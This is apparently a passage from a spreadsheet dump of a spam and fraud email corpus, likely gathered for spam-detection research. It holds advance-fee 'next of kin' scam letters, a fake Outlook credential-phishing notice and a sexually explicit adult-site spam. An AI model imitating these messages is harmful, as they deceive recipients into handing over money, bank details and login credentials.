    <t>IMPORTANT DOMAIN INFORMATION:\n\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domainsforeveryone.com[/URL] today for more info.\n \nRegister your domain name today for just $14.95 at: [URL]http://www.domainsforeveryone.com[/URL]  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.\n \nSincerely,\n \nDomain Administrator\nDomains For Everyone\n\n\nTo remove your email address from further promotional mailings from this company, click here:\n[URL]http://www.centralremovalservice.com[/URL]\n(b1)0474aQIz9-237xTMz9546aZDm1-521Lllj5910RDZl1-150RKYm2509Gxri8-258Tytl2824AfwK4-512Qxl78\n\n\n\n\n\n\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.domainsforeveryone.com http://www.domainsforeveryone.com http://www.centralremovalservice.com http://www.linux.ie</t>
  </si>
  <si>
    <t>4515</t>
  </si>
  <si>
    <t>To: glen12@yahoo.com\nFrom: haggen@freemail.nl\nDate: Wed, 25 Sep 2002 03:08:34 +0100</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 03:08:34 +0100</t>
  </si>
  <si>
    <t>haggen@freemail.nl</t>
  </si>
  <si>
    <t>glen12@yahoo.com</t>
  </si>
  <si>
    <t>FORTUNE 500 WORK AT HOME REPS NEEDED!</t>
  </si>
  <si>
    <t>Immediate Help Needed.  We are a fortune 500 company that is \ngrowing at a tremendous rate of over 1000% per year. We simply cannot \nkeep up. We are looking for motivated individuals who are looking to \nearn a substantial income working from home. \n\nThis is a real opportunity to make an excellent income from home. No \nexperience is required.  We will provide you with any training you may need. \n\nWe are looking for energetic and self motivated people.  If that is you \nthan click on the link below and complete our online information request \nform, \nand one of our employment specialist will contact you. \n\n[URL]http://ter.netblah.com[/URL]\n\nSo if you are looking to be employed at home, with a career that will \nprovide you vast opportunities and a substantial income, please fill \nout our online information request form here now: \n\n[URL]http://www.zhoster.com[/URL] \n\n\nTo be removed from our list simply click on the link below now: \n\n[URL]http://www.zhoster.com[/URL]\n6115CNUY4-341mBpO6887KGZk1-483ZEiE1934cEmx1-116CJYF2258Aegj1-5l58</t>
  </si>
  <si>
    <t>http://ter.netblah.com http://www.zhoster.com http://www.zhoster.com</t>
  </si>
  <si>
    <t>4521</t>
  </si>
  <si>
    <t>To: hbncikzddu@top13.bestoffersonthenet.com\nFrom: firstever001@top13.bestoffersonthenet.com\nDate: Wed, 25 Sep 2002 02:43:44 -0400</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 02:43:44 -0400</t>
  </si>
  <si>
    <t>firstever001@top13.bestoffersonthenet.com</t>
  </si>
  <si>
    <t>hbncikzddu@top13.bestoffersonthenet.com</t>
  </si>
  <si>
    <t>ADV: Extended Auto Warranties Here vfafu</t>
  </si>
  <si>
    <t>Protect your financial well-being.\nPurchase an Extended Auto Warranty for your Car today. \n  \nCLICK HERE for a FREE no obligation quote.\n[URL]http://ww1.bestoffersonthenet.com[/URL]\n       \nCar troubles always seem to happen at the worst possible time. \nProtect yourself and your family with a quality Extended Warranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. \n  \nWe cover most vehicles with less than 150,000 miles.\n      \nBuy DIRECT! Our prices are 40-60% LESS!\n      \nWe offer fair prices and prompt, toll-free claims service.  \n  \nGet an Extended Warranty quote for your car today.\n      \nWarranty plan also includes:\n      \n  1)   24-Hour Roadside Assistance.\n  2)   Rental Benefit.\n  3)   Trip Interruption Intervention.\n  4)   Extended Towing Benefit.\n      \nCLICK HERE for a FREE no obligation quote.\n[URL]http://ww1.bestoffersonthenet.com[/URL]\n             \n            \n            \n            \n          \n---------------------------------------\nTo easily remove your address from the list, go to: \n[URL]http://ww1.bestoffersonthenet.com[/URL]\nPlease allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>http://ww1.bestoffersonthenet.com http://ww1.bestoffersonthenet.com http://ww1.bestoffersonthenet.com</t>
  </si>
  <si>
    <t>4518</t>
  </si>
  <si>
    <t>To: JM@NETNOTEINC.COM\nFrom: Benefits Department &lt;greatoffers@sendgreatoffers.com&gt;\nDate: Wed, 25 Sep 2002 01:00:04 -0500</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 01:00:04 -0500</t>
  </si>
  <si>
    <t>Benefits Department &lt;greatoffers@sendgreatoffers.com&gt;</t>
  </si>
  <si>
    <t>Tell Me Where to Send Your Health Card</t>
  </si>
  <si>
    <t>![]([URL]http://www.ahahealth.com[/URL]") You requested\nto receive this mailing, by registering at Send Great Offers. |\n![]([URL]http://www.ahahealth.com[/URL] |  \n  \n![]([URL]http://www.ahahealth.com[/URL]\n\nI'm your Healthy AdvantageSM **PERSONAL ADVOCATE.** I'm  \navailable 24 hours a day, 7 days a week to help you with insurance  \nclaims, finding a specialist, helping you cut through red tape.  |\n\n![]([URL]http://www.ahahealth.com[/URL]  \n  \n---  \n** FREE for one full month**  \n|\n\n  * **30% off** doctor visits and medical care\n  * **50% off** dental care\n  * **50% off** prescription drugs\n  * **No commitments.** No hassles.\n  * **AND** **MUCH MORE!  \nBest of all, **you cannot be turned down.****\n\n  \n|\n\n**SPECIAL BONUS OFFER:** Get a **FREE** **Samsonite Tote** (with accompanying\n**Cosmetic Case** ) and **10-Piece Manicure Set**. Yours to keep FREE with\nyour  FREE Trial Membership in Healthy Advantage.\n\n|\n\n![]([URL]http://www.ahahealth.com[/URL]  \n  \n---|---  \n  \n![]([URL]http://www.ahahealth.com[/URL]\n\n|  ![]([URL]http://www.ahahealth.com[/URL]  \n  \n**NO SPAM POLICY**  \nYour privacy is important to us. You received this message because you have\nagreed to receive offers from Send Great Offers or one of our carefully\nselected marketing partners.  \nWe abide by a no spam policy. If you believe that you are receiving this\nmessage in error or would no longer like to receive email from Send Great\nOffers, please click on the link below.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www.ahahealth.com http://www.ahahealth.com http://www.ahahealth.com http://www.ahahealth.com http://www.ahahealth.com http://www.ahahealth.com http://www.ahahealth.com http://admanmail.com http://admanmail.com</t>
  </si>
  <si>
    <t>4519</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: AdultClub &lt;nkup@asia.com&gt;\nDate: Wed, 25 Sep 2002 00:48:28 -0700</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 00:48:28 -0700</t>
  </si>
  <si>
    <t>AdultClub &lt;nkup@asia.com&gt;</t>
  </si>
  <si>
    <t>Account zzzz@spamassassin.taint.org</t>
  </si>
  <si>
    <t>New Account For: zzzz@spamassassin.taint.org \n##################################################\n#                                                #\n#                 Adult Club                     #\n#           Offers FREE Membership               #\n#                                                #\n#          3 of the Best Adult Sites             #\n#     on the Internet for Absolutely FREE        #\n#                                                #\n##################################################\n\n&gt; &gt; &gt; &gt; YOU HAVE INSTANT ACCESS TO ALL 3 SITES NOW\n&gt; &gt; &gt; &gt; User Name: zzzz@spamassassin.taint.org\n&gt; &gt; &gt; &gt; Password: 1534\n\n- - - - - - - - - - - - - - - - - - - -\nNEWS 09/24/02\nWith just over 4.8 Million Members that signed up for FREE, Last month there were 921,947 New\nMembers. Are you one of them yet???\n- - - - - - - - - - - - - - - - - - - -\n\nOur Membership FAQ\n\nQ. Why are you offering free access to 3 adult membership sites for free? \nA. I have advertisers that pay me for ad space so you don't have to pay for membership.\n\nQ. Is it true my membership is for life?\nA. Absolutely you'll never have to pay a cent the advertisers do.\n\nQ. Can I give my account to my friends and family?\nA. Yes, as long they are over the age of 18.\n\nQ. Do I have to sign up for all 3 membership sites?\nA. No just one to get access to all of them.\n\nQ. How do I get started?\nA. Click on one of the following links below to become a member.\n\n&gt; &gt; &gt; &gt; Fill in the required info and they won't charge you for the Free\nMembership!\n&gt; &gt; &gt; &gt; If you don't believe us, just read their terms and conditions.\n\n- - - - - - - - - - - - - - - - - - - -\n\n# 3. &gt; Lucky Amateur Wives\n[URL]http://www.bozombo.com[/URL]\nYou won't believe what we take these Wives into doing...FREE VIP Membership!!\n\n# 2. &gt; New! just added today: Cum Drinkers\n[URL]http://www.bozombo.com[/URL]\n950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!\n\n# 1. &gt; Filthy Teen Sluts\n[URL]http://www.bozombo.com[/URL]\nThe Ultimate XXX TEEN Site... FREE VIP Membership!!\n\n- - - - - - - - - - - - - - - - - - - -\n\nJennifer Simpson, Miami, FL\nYour FREE lifetime membership has entertained my boyffriend and I for the last two years!  Your\nAdult Sites are the best on the net!\n\nJoe Morgan Manhattan, NY\nYour live sex shows and live sex cams are unbelievable. The best part about your porn sites, is\nthat they're absolutely FREE!\n\n- - - - - - - - - - - - - - - - - - - -\n\n\n\n\n\n\n\n\n\n\n\n\nDisclaimer:\nWe are strongly against sending unsolicited emails to those who do not wish to receive our special\nmailings. You have opted in to one or more of our affiliate sites requesting to be notified of any\nspecial offers we may run from time to time. We also have attained the services of an independent\n3rd party to overlook list management and removal services. This is NOT unsolicited email. If you\ndo not wish to receive further mailings, please go to [URL]http://greenzer.com[/URL] to be removed\nfrom the list. Please accept our apologies if you have been sent this email in error. We honor all\nremoval requests.\n\nThank you zzzz@spamassassin.taint.org\n\noldhtlheuhcclco</t>
  </si>
  <si>
    <t>http://www.bozombo.com http://www.bozombo.com http://www.bozombo.com http://greenzer.com</t>
  </si>
  <si>
    <t>4516</t>
  </si>
  <si>
    <t>To: ricki36@netposta.net\nFrom: kelli70@swi.hu\nDate: Wed, 25 Sep 2002 00:14:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 25 Sep 2002 00:14:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>kelli70@swi.hu</t>
  </si>
  <si>
    <t>ricki36@netposta.net</t>
  </si>
  <si>
    <t>Holidays are coming?</t>
  </si>
  <si>
    <t>Help wanted.  We are a 14 year old fortune 500 company, that is\ngrowing at a tremendous rate.  We are looking for individuals who\nwant to work from home.\n\nThis is an opportunity to make an excellent income.  No experience\nis required.  We will train you.\n\nSo if you are looking to be employed from home with a career that has\nvast opportunities, then go:\n\n[URL]http://ter.netblah.com[/URL]\n\nWe are looking for energetic and self motivated people.  If that is you\nthan click on the link and fill out the form, and one of our\nemployment specialist will contact you.\n\nTo be removed from our link simple go to:\n\n[URL]http://ter.netblah.com[/URL]\n\n2737cCYw6-489ODYT6241mnnu4-719yRix1751YUrY1-602Nnab8882DYTA1-376gVJi7941l68</t>
  </si>
  <si>
    <t>http://ter.netblah.com http://ter.netblah.com</t>
  </si>
  <si>
    <t>2642</t>
  </si>
  <si>
    <t>To: nan\nFrom: ouadrago lssaka &lt;ouadrago_2004@hotmail.com&gt;\nDate: Wed, 25 Oct 2006 18:00:29 +0000</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2006 18:00:29 +0000</t>
  </si>
  <si>
    <t>ouadrago lssaka &lt;ouadrago_2004@hotmail.com&gt;</t>
  </si>
  <si>
    <t>TREAT AS URGENT .</t>
  </si>
  <si>
    <t>FROM THE DESK OF: Dr.Ouadrago Yamkine Issak,\nIBA INTERNATIONAL  BANK OF BURKINA FASO.\nAFRICA.WEST COAST.BRANCH.\n{USD10,MILLION TO TRANSFER}\n\n\nDear Sir/Madam,\n\nI am Dr.OuadragoYamkine Issak, director INTERNATIONAL BANK OF incharge   \nAfrica bank {IBA}. I have urgent and very confidential  business proposal \nfor you.An American Gold consultant/contractor with the burkina  faso west  \nAfrican Solid Gold Corporation,mr  Morris Thompson made a numbered time \n(Fixed) Deposit for twelve calendar months,valued at US$10,000,000.00 (TEN \nMillion Dollars) in my branch.\n\nUpon maturity, I sent a routine notification to his forwarding address but \ngot no reply. After a month, we sent a reminder and finally we discovered \nfrom his contract employers, the west African Solid Gold Corporation that \nMorris Thompson died in a plane crash in Alaska Airlines Flight 261(for more \ninformation about this crash and person you can contact this website:\n[URL]http://archives.cnn.com[/URL]\nsince we got this information about his death. On further investigation, I \nfound out that he died without making a WILL, and all attempts to trace his \nnext of kin was fruitless.\n\nI therefore made further investigation and discovered that Mr  Morris \nThompson did not declare any kin or relations in all his official documents, \nincluding his Bank Deposit paperwork in the Bank. This sum of \nUS$10,000,000.00 is still sitting in the Bank and the  interest is being \nrolled over with the principal sum at the end of each year. No one will ever \ncome forward to claim it.\nAccording to Laws of Republic OF BURKINA  FASO,  at the expiration of 4 \n(four) years, the money will revert to the ownership of the burkina  faso \nGovernment if nobody applies to claim the fund. Consequently, i am due to \nretire from office next year 2007,\n\nMy proposal is that I will like you tp come in as a next kin/ foreigner to \nstand in as the next of kin to Mr.Morris Thompson so that the fruits of this \nold man's labor will not get into the hands of some corrupt government \nofficials.\nThis is simple, I will like you to provide immediately your full names and \naddress so that the attorney will prepare the necessary documents and \naffidavits that will put you in place as the next of kin.through the bank \nattorney as soon as you put application to the bank.We shall employ the \nservices of an attorney for drafting and notarization of the WILL as  the \nbank will approve you as  the next of kin and to obtain the necessary \ndocuments and letter of probate/administration in your favor for the \ntransfer.\n\nA bank account in any part of the world that you will provide will then \nfacilitate the transfer of this money to you as the beneficiary/next of kin. \nThe money will be paid into your account for us to share in the ratio of 75% \nfor me and 20% for you.then 5%will be map out for any expenses that may \noccure during transactions.\nThere is no risk at all as all the paperwork for this transaction will be \ndone by the attorney as will employ him on  the approval of the bank; i am \nnotifying  you this as a secret of mine, as a senior bank officer.i knew all \n  what it takes  to get  this funds out of  the bank. and my position and \nthat of YOU  qarantees the successful execution of this transaction. If you \nare interested, please reply immediately via the private email address \nabove. Upon your response, I shall then provide you with more details and \nrelevant application letter  that will help you understand the transaction. \nPlease send me your confidential telephone and fax numbers for easy \ncommunication.\n\nPlease observe utmost confidentiality, and rest assured that this \ntransaction would be most profitable for both of us because I shall require \nyour assistance to invest my share in your country.\n\n\nAwaiting your urgent reply\nBest Regard.\nDr.Ouadrago Issak Yamkine,\n\n_________________________________________________________________\nTestez Windows Llive Mail Beta ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://archives.cnn.com http://www.msn.fr</t>
  </si>
  <si>
    <t>1711</t>
  </si>
  <si>
    <t>To: nan\nFrom: HULFUMAN DAVID &lt;hulfumandav2006@latinmail.com&gt;\nDate: Wed, 25 Jan 2006 07:27:58 +0000</t>
  </si>
  <si>
    <t>Wed, 25 Jan 2006 07:27:58 +0000</t>
  </si>
  <si>
    <t>HULFUMAN DAVID &lt;hulfumandav2006@latinmail.com&gt;</t>
  </si>
  <si>
    <t>PLS URGENT REPLY NEEDED</t>
  </si>
  <si>
    <t>MR. HULFUMAN DAVID\nGHANA COMMERCIAL\nBANK LTD.\n19 KOTOBABI AVE. \nACCRA GHANA.\nEMAIL&gt;hulfumandav2006002@yahoo.ca \n\nGood Day,\n\nI am Mr.HULFUMAN DAVID, credit officer of ghana\ncommercial Bank Ltd, accra ghana. I  have an urgent\nand  very confidential business proposition for you.\nOn october 15, 1999, our client Mr. Hatem Kamil Abdul\nFatah who was the deputy governor of Baghdad in Iraq\nand also business man made a numbered fixed deposit\nfor 12 calendar months, with a value of  Fourty\nMillions Five Hundred Thousand United State Dollars\nonly in my branch.\nUpon maturity several notice was sent to him, even\nafter the war late this year.  Another notification\nwas sent and still no response\ncame from him. We later find out that the Governor has\nbeen\nassasinated in Baghdad.\nThe websites below is a verification of the news about\nhis death:\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://www.uslaboragainstwar.org[/URL]\nAfter further investigation it was also discovered\nthat Mr. Hatem Kamil Abdul Fatah did not declare any\nnext of kin in his official papers including the paper\nwork of his bank deposit. And he also confided in\nme,last time he was at my office that no one except\nme knew of his deposit in my bank.\nAccording to the ghana Law,under ecowas's foreign and\ndefense affairs,at the expiration of 5 (five)\nyears,such funds will revert to the ownership of the\nghanian Government for financing military\noperations,such as purchasing of arms and ammunitions\nfor the military.\nIn order to avert this negative development,i will\nlike to seek for your permission as a foreigner to\nstand as the next of kin to  Mr. Hatem Kamil Abdul\nFatah so that the fruits of this old man's labor will\nnot be use for financing weapons which will further\nenhance the courses of war in the world in general.\nThe money will be paid into your account for us to\nshare in the ratio of 60% for me and 30% for you and\n10% for Expenses Incurred in the course of the\ntransaction.There is no risk at all as all the\npaperwork  for this transaction will be done by my\nattorney and with my position as the credit officer\nguarantees the successful execution of this\ntransaction. If you are interested,please reply\nimmediately.\nUpon your response, I shall then provide you with more\ndetails and that will help you understand the\ntransaction.\nYou should observe utmost confidentiality,and rest\nassured  that this  transaction would be most\nprofitable for both of us because I shall require your\nassistance to invest my share in your country.\nAwaiting your urgent reply.\nThanks and regards.\nMr.HULFUMAN DAVID.\nEMAIL&gt;hulfumandav2006002@yahoo.ca\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>3053</t>
  </si>
  <si>
    <t>To: nan\nFrom: abisha allahim &lt;mr_allahim2@hotmail.com&gt;\nDate: Wed, 25 Apr 2007 23:58:24 +0000</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2007 23:58:24 +0000</t>
  </si>
  <si>
    <t>abisha allahim &lt;mr_allahim2@hotmail.com&gt;</t>
  </si>
  <si>
    <t>DEAR PARTNER,\n\nI AM MR. ABISHA ALLAHIM, THE BILL AND EXCHANGE MANAGER AT THE FOREIGN \nEXCHANGE DEPARTMENT OF INTERNATIONAL BANK OF BURKINA (IBB) OUAGADOUGOU IN \nBURKINA FASO. WITH DUE RESPECT AND REGARDS, I HAVE DECIDED TO CONTACT YOU ON \nA BUSINESS TRANSACTION THAT WILL BE VERY BENEFICIAL TO BOTH OF US AT THE END \nOF THE TRANSACTION.DURING MY INVESTIGATION AND AUDITING IN MY DEPARTMENT, I \nCAME ACROSS A VERY HUGE SUM OF MONEY BELONGING TO A DECEASED PERSON, A \nFOREIGNER WHO DIED IN A PLANE CRASH WITH HIS INTIRE FAMILY.\n\nREPLY ONLY TO MY PRIVATE E-MAIL  mr_a_allahim001@yahoo.fr\n\n\nTHE FUND HAS BEEN IN HIS ACCOUNT WITH THE BANK WITHOUT ANY CLAIM OF THE FUND \nIN OUR CUSTODY EITHER FROM HIS FAMILY OR RELATION BEFORE OUR DISCOVERY TO \nTHIS DEVELOPMENT.ALTHOUGH PERSONALLY, I KEPT THIS INFORMATION SECRET WITHIN \nMYSELF TO ENABLE THE WHOLE PLANS AND IDEA BE PROFITABLE AND SUCCESSFUL \nDURING THE TIME OF EXECUTION. THE AMOUNT INVOLVED IS USD$10.500,000 (TEN \nMILLION FIVE HUNDRED THOUSAND U.S DOLLARS.) MEANWHILE THE WHOLE ARRANGEMENT \nAND DIRECTIVES NEEDED TO PUT CLAIM OVER THIS FUND AS THE NEXT OF KIN TO THE \nDECEASED, WILL BE FORWARD TO YOU UPON YOUR ACCEPTANCE. INFORMATION WILL BE \nRELAYED TO YOU AS SOON AS YOU INDICATE YOUR INTEREST AND WILLINGNESS TO \nASSIST ME AND ALSO BENEFIT YOURSELF TO THIS GREAT BUSINESS OPPORTUNITY.\n\nIN FACT I COULD HAVE DONE THIS DEAL ALONE BUT BECAUSE OF MY POSITION IN THIS \nCOUNTRY AS A CIVIL SERVANT, WE ARE NOT ALLOWED TO OPERATE A FOREIGN ACCOUNT \nAND WOULD EVENTUALLY RAISE AN EYE BROW ON MY SIDE DURING THE TIME OF \nTRANSFER BECAUSE I WORK IN THIS BANK. THIS IS THE ACTUAL REASON WHY IT WILL \nREQUIRE A SECOND PARTY OR FELLOW WHO WILL FORWARD CLAIMS AS THE NEXT OF KIN \nTO THE BANK AND ALSO PRESENT A FOREIGN ACCOUNT WHERE HE\nWILL NEED THE MONEY TO BE TRANSFERRED INTO ON HIS REQUEST AS IT MAY BE, \nAFTER DUE VERIFICATION AND CLARIFICATION TO DESIGNATED BANK ACCOUNT.\n\nYOU CAN  SEE THE WEBSITE BELOW COVERING THE PLANE CRASH BY CNN &amp; BBC NEWS.\n\n[URL]http://www.cnn.com[/URL]\n\n[URL]http://news.bbc.co.uk[/URL]\nI WILL NOT FAIL TO INFORM YOU THAT THIS TRANSACTION IS 100% RISK FREE. ON \nSMOOTH CONCLUSION OF THIS TRANSACTION, YOU WILL BE ENTITLED TO 40% OF THE \nTOTAL SUM WHILE 60% WILL BE FOR ME. YOU HAVE BEEN ADVISED TO KEEP TOP SECRET \nAS I AM STILL IN SERVICE AND INTEND TO RETIRE FROM SERVICE AFTER I CONCLUDE \nTHIS DEAL WITH YOU.\n\nI WILL BE MONITORING THE WHOLE SITUATION HERE IN THE BANK UNTIL YOU CONFIRM \nTHE MONEY IN YOUR ACCOUNT AND ASK ME TO COME DOWN TO YOUR COUNTRY FOR \nSUBSEQUENT SHARING OF THE FUND ACCORDING TO PERCENTAGES PREVIOUSLY INDICATED \nAND FURTHER INVESTMENT, EITHER IN YOUR COUNTRY OR ANY OTHER COUNTRY YOU MAY \nADVICE ME TO INVEST IN. ALL OTHER NECESSARY INFORMATION WILL BE SENT TO YOU \nWHEN I HEAR FROM YOU. I SUGGEST YOU GET BACK TO ME AS SOON AS POSSIBLE \nSTATING YOUR WISH IN THIS DEAL.\n\nPLEASE REPLY TO MY PRIVATE E-MAIL   mr_a_allahim001@yahoo.fr\nBY INDICATING YOUR BANK ACCOUNT DETALS WHERE THE FUND WILL BE TRANSFERED TO. \nALSO, SEND ME YOUR PRIVATE PHONE NUMBER FOR EASY COMMUNICATION.\n\nBEST REGARD,\nMR. ABISHA ALLAHIM\n\n_________________________________________________________________\nMSN Messenger: appels gratuits de PC  PC ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com http://news.bbc.co.uk http://www.msn.fr</t>
  </si>
  <si>
    <t>365</t>
  </si>
  <si>
    <t>To: jidewilliams000@arabia.com\nFrom: jide williams &lt;jide.williams@seznam.cz&gt;\nDate: Wed, 24 Sep 2003 16:43:58 +0200</t>
  </si>
  <si>
    <t>Wed, 24 Sep 2003 16:43:58 +0200</t>
  </si>
  <si>
    <t>jide williams &lt;jide.williams@seznam.cz&gt;</t>
  </si>
  <si>
    <t>jidewilliams000@arabia.com</t>
  </si>
  <si>
    <t>partnership</t>
  </si>
  <si>
    <t>FROM: MR. JIDE WILLIAMS\n\nJOHANNESBURG,\nSOUTH\n\nAFRICA.\n\nEMAIL,jidewilliams000@arabia.com\n\n\n\n\n\nREQUEST FOR\nURGENT\n\nASSISTANCE/INVESTMENT.\n\nDear Sir/Madam ,\n\nMy names is MR. JIDE WILLIAMS, \nthe elder son of Mr. ANTHONY WILLIAMS, of Zimbabwe. It might be a\nsurprise to you where I got your contact address, I got it from network on line, South African. During the current crises against the farmers of Zimbabwe\nby the supporters of our President Robert Mugabe to claim all the white owned farms in our country, he ordered all the white farmers to surrender their farms \nto his party members and their followers.\n\nMy father was one of the best\nfarmers in the country and knowing that he did not support the presidential\npolitical ideology, the presidential supporters invaded\n\nmy fathers farm\nburnt down everything, shot him and as a result of the wounds\n\nsustained, he\nbecame sick and died after two days. And after his death, I with\n\nmy\nyounger Brother decided to move out of Zimbabwe for the safety of our \n\nlives \nto South-Africa.\n\nBUT, before he died HE WROTE HIS WILL, which reads\n\n"(MY\nBELOVEED SON ,I WISH TO DRAW YOUR ATTENTION TO\n\nTHE SUM OF ($9,000,000=00).\nMILLION U.S DOLLARS WHICH\n\nI DEPOSITED IN A BOX WITH A SECURITY COMPANY IN\n\nJOHANNESBURG (SOUTH-AFRICA). IN CASE OF MY ABSENCE\n\nON EARTH CAUSED BY DEATH ONLY". You should solicit for\n\nreliable foreign partner to assist you\nto transfer this money out of South Africa for\n\ninvestment purpose. I deposited the money in your name and it can be\n\nclaimed by you alone with the deposit code. your mother has all the documents. Take good care of your mother and brother." From the above, you will understand that the lives and\nfuture of my family depends on this money as much, I will be very grateful if you can assist us. I with my younger brother are now\n\nliving in South-Africa as POLITICAL ASYLUM SEEKERS and the financial law of SOUTH-AFRICA does not allow ASYLUM SEEKERS certain Financial rights to such huge amount of money .In view of this, I cannot invest this money in South-Africa, hence I am asking you to assist me transfer this money out of South-Africa for investment purposes. For your efforts, I am prepared to offer you 20% of the total\n\nfund, while 5% will be set aside for local and international expenses and 75% will be kept for me and my family\n\n\n\nFinally modalities on how the transfer will be done will be\nconveyed to you \n\nonce we establish trust and confidence between ourselves.\nLooking forward to your urgent reply .For detailed information. \n\nNOTE:\nTHE KEY WORD TO THIS TRANSACTION IS ABSOLUTE CONFIDENTIALITY AND SECRECY. THIS\nTRANSACTION IS 100% RISK FREE. YOUR URGENT RESPONSE WILL BE\nHIGHLY\n\nAPPRECIATED. \n\nBEST REGARDS,\n\nJide Williams\n\n____________________________________________________________\nŘekněte sýr! MMS telefon SonyEricsson T610 s foťákem můžete mít už za 5577\nKč. A k tomu až 120 MMS zdarma! [URL]http://ad2.seznam.cz[/URL]\n\n</t>
  </si>
  <si>
    <t>http://ad2.seznam.cz</t>
  </si>
  <si>
    <t>1007</t>
  </si>
  <si>
    <t>To: nan\nFrom: marah sadija &lt;sadijjam@yahoo.co.in&gt;\nDate: Wed, 24 Nov 2004 16:57:04 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Nov 2004 16:57:04 -0500</t>
  </si>
  <si>
    <t>marah sadija &lt;sadijjam@yahoo.co.in&gt;</t>
  </si>
  <si>
    <t>CRY FOR HELP</t>
  </si>
  <si>
    <t>\nDear sir/madam,\nthis mail will definitely be coming to you as a surprise, but i must \ncrave your indulgence to introduce myself to you.\nI am Miss Marah sadija, former mistress to the son (Qusay) of the Iraqi former leader, Saddam Hussein.\nI am an Ethiopian, by birth and i am presently in a refugee camp in  Zimbabwe,where the living conditions are unbearable.\nI do not wish to take your time with a lenghty mail, but i have to put this proposal to you so that you can assist me.\nWhile i was still in contact with Qusay,he made a deposit in my\nname to a security firm in Spain, which has an affiliate branch in \nAmsterdam.\nThis deposit was made in my name and the secret code and necessary  documents are presently in the possession of an attorney, presently in London.\nThis deposit was made in the form of a consigment and the content is a considerable amount of money in United state dollars which i cannot  disclose to you for security purposes, until you have confirmed your willingness to assist me.\nI would be pleased and grateful to you if you could assist me in \ncollecting this consignment on my behalf from the security firm in Spain, upon  which i will be offering you a percentage for your efforts.\nThe attorney in London, will arrange an authority to release and pay in your name which you will tender to the security firm coupled with all necessary documents that will back up your claims in collecting this consignment  on my behalf.\nI have to stop here now as your response will determine our\nsubsequent corresspondence. Please feel free to dis-regard this \nproposal if it is not in line with your principles.\nPLEASE RESPOND TO sadijjam@yahoo.co.in\nAllah bless you,\nMarah Sadija.\n \n\n\n\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at - [URL]http://www.avym.org[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.avym.org</t>
  </si>
  <si>
    <t>584</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "Email Verification" &lt;EmailVerification@gmail.com&gt;\nDate: Wed, 24 May 2017 18:30:55 -0400</t>
  </si>
  <si>
    <t>Wed, 24 May 2017 18:30:55 -0400</t>
  </si>
  <si>
    <t>"Email Verification" &lt;EmailVerification@gmail.com&gt;</t>
  </si>
  <si>
    <t>Email Update</t>
  </si>
  <si>
    <t>Hi jose@monkey.org,       As part of our effort to improve your experience across our consumer services, we 19re updating the Microsoft Services Agreement and the Microsoft Privacy Statement , jose@monkey.org was loged in, has recently updated.  Please click on the below to update your account.       [URL]https://mail.securedserver.jose@monkey.org[/URL]        this is just a notification for your account safety, just follow the above link and Sign Back and Continue your free usage.      Have a great day!  Outlook.com Team.              Replies sent to this email address cannot be answered.  Hi jose@monkey.org, As part of our effort to improve your experience across our consumer services, we’re updating the Microsoft Services Agreement and the Microsoft Privacy Statement , jose@monkey.org was loged in, has recently updated. Please click on the below to update your account.  [URL]https://mail.securedserver.jose@monkey.org[/URL]  this is just a notification for your account safety, just follow the above link and Sign Back and Continue your free usage.  Have a great day! Outlook.com Team.  Replies sent to this email address cannot be answered.</t>
  </si>
  <si>
    <t>https://mail.securedserver.jose@monkey.org https://mail.securedserver.jose@monkey.org</t>
  </si>
  <si>
    <t>646</t>
  </si>
  <si>
    <t>To: james001@postino.it\nFrom: james001@postino.it\nDate: Wed, 24 Mar 2004 23:13:14 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Mar 2004 23:13:14 +0100</t>
  </si>
  <si>
    <t>james001@postino.it</t>
  </si>
  <si>
    <t>James</t>
  </si>
  <si>
    <t>From: The Desk of Ajibola James\nSenior Manager: Pacific International Bank PLC.\n                40 Marina Street\n                Lagos\n\nDear friend,\n\nFirst, I must solicit your confidence in this transaction. This is by virtue \nof its nature being utterly confidential and  top secret. We have decided to \ncontact you due to the urgency  of this  transaction, as we have been reliably \ninformed of your discretness, trustworthy and ability to carry out legitimate  \nbusiness.\n\nTHE PROPOSITION: An American, Mr. Shaline Adam, an Oil merchant with the \nFederal Government of  Nigeria, until his death with his whole family on an \nEgyptAir Flight #990, which  crashed into the Atlantic Ocean on October 31, \n1999, banked  with us at Pacific International Bank Plc Lagos and had a \nclosing balance of US$3.5,000,000.00 (Three Milion Five Hundred Thousand \nUnited States  Dollars Only) as at the end of September, 2000. Attached here   \nis a CNN webpage on the unfortunate crash in 1999:   \n[URL]http://www.cnn.com[/URL]\n\nValuable efforts have been made by the bank to get in touch  with any of the \nAdam's family or relative, but to no avail. His Next of Kin was his wife that \nwas involved in the crash so for now there is no trace of his family.\n\nIt is because of the perceived impossibility of locating a relative of the \nShaline Adam's family (since all his family are dead) that the bank is making \nplans to ceed the said amount to the Defence Ministry for the procurement of \nweapons of war. In order to avert this ugly situation, few of my colleagues \nand I have decided to contact you and seek your   permission to have you stand \nas a relative to Late Shaline Adam so that the total amount of US$3.5 Million \nDollars will be processed and released in your favour into your personal \naccount.\n\nAll documents and proofs to enable you get this fund will be   carefully \nworked out. We have secured from the probate, an   order of Madamus, to locate \nany of the deceased beneficiary.   Be rest 